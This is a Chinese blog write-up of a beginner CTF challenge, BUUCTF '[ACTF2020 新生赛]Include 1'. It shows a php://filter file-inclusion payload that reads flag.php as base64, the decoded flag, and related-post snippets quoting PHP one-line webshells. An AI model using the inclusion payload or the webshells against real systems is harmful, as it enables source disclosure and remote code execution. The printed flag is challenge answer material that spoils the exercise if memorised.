第四篇笔记No.4(7)[ACTF2020 新生赛]Include 1

最新推荐文章于 2024-07-08 21:46:47 发布
最新推荐文章于 2024-07-08 21:46:47 发布
阅读量201 收藏
点赞数 1
分类专栏: BUUCTF做题笔记 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48963887/article/details/109320424
版权

第四篇笔记No.4(7)[ACTF2020 新生赛]Include1

这道题的知识点是文件包含和php伪协议。靶场的链接是http://3511fd08-9f02-40df-b2c7-c391ba3f78bb.node3.buuoj.cn/
在链接之后加上/?file=php://filter/read=convert.base64-encode/resource=flag.php就可以得到flag了,下面我们一起进去看看做题流程,刚进去页面是这样的
在这里插入图片描述
进入后台
在这里插入图片描述
点了一下tips
在这里插入图片描述
看到显示 /?file=flag.php,可以用伪协议读flag.php,一般语句为php://filter/read=convert.base64-encode/resource=xxx
根据题目的具体情况,在链接之后加上
?file=php://filter/read=convert.base64-encode/resource=flag.php 得到http://3511fd08-9f02-40df-b2c7-c391ba3f78bb.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php
在这里插入图片描述
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NTg2NzU1NmYtNWE0NC00ZjRhLTgyOTMtNWEyZTQ2ODJlZDE3fQo= 从密文可以看出是Base64加密,
Base64解密链接
解密之后
在这里插入图片描述

<?php echo "Can you find out the flag?"; //flag{5867556f-5a44-4f4a-8293-5a2e4682ed17} > 把flag复制进去之后就完成了,加油!!!
DYCCGEB
关注
专栏目录
[ACTF2020 新生]Include1
weixin_64160292的博客
03-31 5292
题目:[ACTF2020 新生]Include1 题目来源:buuctf 过程分析: 1、首先看到一个tips,我们打开看看 然后从题目我们知道这个是一个文件包含题,对文件进行php伪协议检测 伪协议 php://input:用来接收POST数据。我们能够通过input把我们的语句输入上去然后执行。 条件: php <5.0 ,allow_url_include=Off 情况下也可以用 php > 5.0,只有在allow_url_fope
[ACTF2020 新生]Include 1
qq_51553814的博客
08-01 1472
[ACTF2020 新生]Include 1 首先看题目信息有个关键字include,我们就应该能猜到这题的主要考点是文件包含 进入靶场 一进去,就让我们点击,那么我们就点击瞅瞅吧 果然不出所料,url上面显眼的‘file=’就是我们想要的文件包含漏洞 以开始以为flag在其他漏洞,我先用file=php//input,再Post传参 但是当url后面接上file=php://input时,就直接给我返回了hacker页面,看来服务器是对input过滤了 那么就换一个方式,先用file=php:/
[ACTF2020 新生]Include1 php://filter 解题纪要
最新发布
qq_37079022的博客
07-08 135
一看就是文件包含 但是不常做ctf的会去用文件包含找 flag但是其他flag就在flag.php中为什么flag在flag.php中但是不显示那 因为有可能被注释了现在我们需要把把他的原文导出来 在进行分析如何用文件包含导出php原文。
BUU 【ACTF2020 新生Include 1 解题大致思路
半文盲半疯癫重度手机爱好者,世界选社恐大赛第二名。
07-14 1149
1.首先打开靶场环境 看到链接tips 打开tips 2.
[ACTF2020 新生]Include (文件包含漏洞)_include ctf
m0_61549740的博客
04-06 796
构造payload:​​​​​​​?就可以得到base64编码后的flag.php:利用进行解码:得到flag.php的内容:即可得到flag。
ACTF2020 新生 Upload 1
qq_52715164的博客
04-20 3939
打开网页发现是个文件上传的页面,试着上传php文件,发现不行后, 尝试burp抓包,修改文件后缀,进行前端绕过,发现可行。 具体步骤如下: 1、书写一句话木马,例如: eval和assert: php任意代码执行的一句话后门,我们喜欢用的是传统的eval,php5,7通用。 <?php @eval($_GET["cmd"]); ?> <?php @assert($_POST['a']) ?> create_function和preg_replace函数: create_func
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值